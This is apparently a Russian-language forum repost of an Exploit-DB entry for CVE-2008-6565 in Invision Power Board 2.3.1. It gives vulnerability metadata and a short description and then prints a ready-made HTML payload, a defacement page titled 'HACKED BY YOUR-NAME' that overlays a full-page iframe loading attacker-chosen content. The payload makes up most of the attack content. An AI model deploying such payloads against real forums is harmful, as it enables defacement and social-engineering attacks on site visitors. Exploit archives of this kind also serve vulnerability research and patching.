Exploit Invision Power Board 2.x - 'Signature' iFrame Security

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31541
Проверка EDB
  1. Пройдено
Автор
SHAHEE_MIRZA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6565
Дата публикации
2008-03-26
HTML:
source: https://www.securityfocus.com/bid/28466/info


Invision Power Board (IP.Board) is prone to a security vulnerability that can aid attackers in social-engineering attacks.

Attacker-supplied script code could exploit vulnerabilities in the user's browser or give the user a false sense of security when visiting trusted web pages, which can aid in launching further attacks.

This issue affects IP.Board 2.3.1; other versions may also be affected. 

<html> <head> <title>HACKED BY YOUR-NAME</title> </head> <body> <div id="iFrame1" style="position:absolute; left:0px; top:0px; z- index:0"> <iframe name="iFrame1" width=1024 height=3186 src="http://www.example.com/ YOUR-PATH/YOUR.html" scrolling="no" frameborder="0"></iframe> </div> </body> </html>
 
Источник
www.exploit-db.com

Похожие темы